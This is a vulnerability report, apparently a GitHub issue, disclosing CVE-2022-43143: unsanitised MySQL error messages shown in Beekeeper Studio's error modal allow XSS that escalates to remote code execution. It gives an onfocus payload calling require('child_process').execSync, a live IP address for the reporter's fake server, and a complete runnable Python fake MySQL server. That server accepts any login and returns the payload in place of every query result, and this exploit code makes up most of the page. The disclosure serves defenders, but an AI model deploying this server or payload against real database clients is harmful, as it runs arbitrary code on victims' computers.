CVE-2022-43143: BUG: Beekeeper Remote Code Execution via XSS · Issue #1393 · beekeeper-studio/beekeeper-studio

A cross-site scripting (XSS) vulnerability in Beekeeper Studio v3.6.6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the error modal container.


Author: [email protected]

Date: 2022-10-07

OS: Windows, Linux, MacOS

Beekeeper Studio Version: 3.6.6

DB Type & Version: MySQL 5.7 and 8.0

Summary

It is possible to trigger remote code execution through Beekeeper's modal container.

Description

Beekeeper has a modal container that reports the result of the user's action. Because the modal contents are not sanitized, it is vulnerable to XSS, as shown here:

[screenshots 1 and 2 omitted]

The modal's content is also taken from the MySQL packet returned by the server, but only when the user's action fails (that is, from the server's error response):

[screenshot omitted]

So, building on the approach reported in CVE-2022-26174, remote code execution is possible via the modal container.

In this case, I made a fake MySQL server that spoofs the user's modal output when the user inserts data into a table.

This is my sample fake SQL server: poc.py

You can see in this PoC video that the fake SQL server triggers RCE via Beekeeper.

PoC_Video

In this video, I used the XSS script <input type="text" onfocus="require('child_process').execSync('calc.exe')" autofocus /> as the modal error output: whatever input the user passes is replaced by that XSS script and returned to the user.

Finally, the malicious code is triggered on the user's PC and keeps running until the modal is dismissed.

What’s More?

  • Not only the data-inserting functions but any function that uses the error modal (e.g. create table) seems to let us trigger RCE too.

Temporary Fake SQL Server

146.56.129.188:3306
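The fake MySQL server described above, written out as an added example; this is not the reporter's poc.py (which is not reproduced on this page) and not Beekeeper's code. It speaks just enough of the MySQL client/server protocol to greet a client, accept whatever credentials arrive, and answer every COM_QUERY with an ERR packet whose message is the payload from the report. The listening address, the advertised server version string, the error code and the SQLSTATE are arbitrary choices for the example; the bytes that matter are the ERR packet, because its free-form message is what the client copies into its error modal.

```python
import socket
import struct

# Capability flags (subset) from the MySQL client/server protocol.
CLIENT_LONG_PASSWORD = 0x00000001
CLIENT_LONG_FLAG = 0x00000004
CLIENT_CONNECT_WITH_DB = 0x00000008
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
SERVER_CAPABILITIES = (CLIENT_LONG_PASSWORD | CLIENT_LONG_FLAG | CLIENT_CONNECT_WITH_DB
                       | CLIENT_PROTOCOL_41 | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH)

COM_QUIT, COM_QUERY, COM_PING = 0x01, 0x03, 0x0E

# The payload from the report, returned verbatim as the "error message".
PAYLOAD = """<input type="text" onfocus="require('child_process').execSync('calc.exe')" autofocus />"""


def frame(seq, payload):
    """Wrap a payload in the 4-byte MySQL packet header (3-byte LE length + sequence id)."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def parse_header(hdr):
    """Split a 4-byte packet header into (payload length, sequence id)."""
    return hdr[0] | (hdr[1] << 8) | (hdr[2] << 16), hdr[3]


def build_handshake(seq=0, version=b"8.0.30", conn_id=1):
    """HandshakeV10 greeting advertising mysql_native_password (version string is arbitrary)."""
    salt = b"A" * 20  # fixed nonce: the client's password is never checked anyway
    payload = (
        b"\x0a"                                    # protocol version 10
        + version + b"\x00"                         # server version, NUL-terminated
        + struct.pack("<I", conn_id)
        + salt[:8] + b"\x00"                        # auth-plugin-data-part-1 + filler
        + struct.pack("<H", SERVER_CAPABILITIES & 0xFFFF)
        + b"\x21"                                   # charset utf8_general_ci
        + struct.pack("<H", 0x0002)                 # status: SERVER_STATUS_AUTOCOMMIT
        + struct.pack("<H", SERVER_CAPABILITIES >> 16)
        + bytes([len(salt) + 1])                    # auth plugin data length (incl. NUL)
        + b"\x00" * 10                              # reserved
        + salt[8:] + b"\x00"                        # auth-plugin-data-part-2 (13 bytes)
        + b"mysql_native_password\x00"
    )
    return frame(seq, payload)


def build_ok(seq):
    """OK_Packet: header 0x00, affected_rows=0, last_insert_id=0, status flags, warnings."""
    return frame(seq, b"\x00\x00\x00" + struct.pack("<HH", 0x0002, 0))


def build_err(seq, message, code=1064, sql_state=b"42000"):
    """ERR_Packet: 0xff, error code, '#' + 5-char SQLSTATE, then the free-form message."""
    return frame(seq, b"\xff" + struct.pack("<H", code) + b"#" + sql_state + message.encode())


def handle_command(payload, message=PAYLOAD):
    """Map one client command to the reply bytes, or None to hang up.

    Every COM_QUERY is answered with an ERR packet carrying the attacker-controlled
    message; that message is what the client shows in its error modal. Sequence ids
    restart at 0 for each command, so every reply is sequence 1.
    """
    if not payload or payload[0] == COM_QUIT:
        return None
    if payload[0] == COM_PING:
        return build_ok(1)
    if payload[0] == COM_QUERY:
        return build_err(1, message)
    return build_err(1, "unsupported command", code=1047, sql_state=b"08S01")


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            return None
        buf += chunk
    return buf


def read_packet(sock):
    """Read one framed packet; returns (seq, payload) or (None, None) on EOF."""
    hdr = _recv_exact(sock, 4)
    if hdr is None:
        return None, None
    length, seq = parse_header(hdr)
    return seq, _recv_exact(sock, length)


def serve_client(conn):
    """Greet, accept any credentials, then poison every query result."""
    conn.sendall(build_handshake(seq=0))
    seq, _response = read_packet(conn)   # HandshakeResponse41; credentials are ignored
    if seq is None:
        return
    conn.sendall(build_ok(seq + 1))       # "authenticated" without any password check
    while True:
        seq, payload = read_packet(conn)
        if seq is None:
            return
        reply = handle_command(payload)
        if reply is None:
            return
        conn.sendall(reply)


def serve(host="127.0.0.1", port=3306):
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(5)
        print(f"fake MySQL listening on {host}:{port}")
        while True:
            conn, _addr = srv.accept()
            with conn:
                serve_client(conn)


if __name__ == "__main__":
    serve()
```

Run it and point a Beekeeper connection at the listener's host and port: the first query the client sends, or the insert the user performs, comes back as the attacker-controlled error. The same exchange works against any client that copies the ERR message into a view, which is why the report notes that every function using the error modal is affected. The onfocus handler only reaches the operating system because the renderer can call require('child_process'); the identical string rendered as text rather than HTML, or in a renderer without Node integration, would merely be displayed.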

Related news

CVE-2022-26174: RCE Vulnerability in Beekeeper Studio · Issue #1051 · beekeeper-studio/beekeeper-studio

A remote code execution (RCE) vulnerability in Beekeeper Studio v3.2.0 allows attackers to execute arbitrary code via a crafted payload injected into the display fields.
